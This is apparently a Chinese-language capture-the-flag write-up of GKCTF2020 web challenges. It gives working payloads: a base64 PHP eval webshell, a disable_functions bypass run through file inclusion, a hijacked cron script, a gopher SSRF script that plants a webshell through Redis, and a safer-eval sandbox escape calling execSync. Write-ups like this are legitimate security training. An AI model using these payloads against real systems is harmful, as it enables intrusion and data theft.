0%

GKCTF2020-CheckIN

base64加密一下可以直接RCE:

?Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==

测试发现tmp目录是可以写东西。但是直接读flag是没法读得。但是发现有readflag这个程序在根目录,但是这里把执行系统命令的函数都给禁了,这里要bypass 一下disable function.

直接exp一把梭:

https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass

exp上传到/var/tmp/3.txt,直接包含执行就行了。

http://ebd8d9e8-ee16-4153-8396-b65d3b3b95ac.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a=var_dump(include('../../tmp/3.txt'));

echo pwn(“echo /readflag > /var/tmp/a.txt”);

微信图片_20200526145744

老八小超市儿

直接网上搜shopX0 getshell http://www.nctry.com/1660.html

那道shell之后呢,发现根目录下的flag是假的,还有个hint。不知道这个hint有啥用,但是在auto.sh有一个很明显的地方

#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

这里应该设定了定时任务每60秒执行一次这个脚本,而且这个makeflaghint.py 脚本我们有权限修改。我们直接修改脚本就能读到/root/flag。

f = open('/root/flag','r')
f2 = open('/666.txt','w')
flag = f.read()
f2.write(flag)
f.close()
f2.close()

EZ三剑客-EzWeb

这道题和安恒还是广东强网某道题基本一样。也是SSRF打Redis.

SSRF对内网IP进行探测然后对端口探测发现是Redis,然后EXP一把梭。

import urllib
import urllib.parse
protocol="gopher://"
ip="173.138.94.11"
port="6379"
shell='\n\n<?php eval($_GET["cmd"]);?>\n\n'
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)
gopher://173.138.94.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

最后读flag需要绕一下空格。

cve版签到

?url=http://127.0.0.123%00.ctfhub.com

EZ三剑客-EzNode

const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 为了方便我自己查看版本,加上这个接口
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

小trick

setInterval.constructor('return process')().mainModule.require('child_process').execSync('cat /flag').toString();

微信截图_20200527142405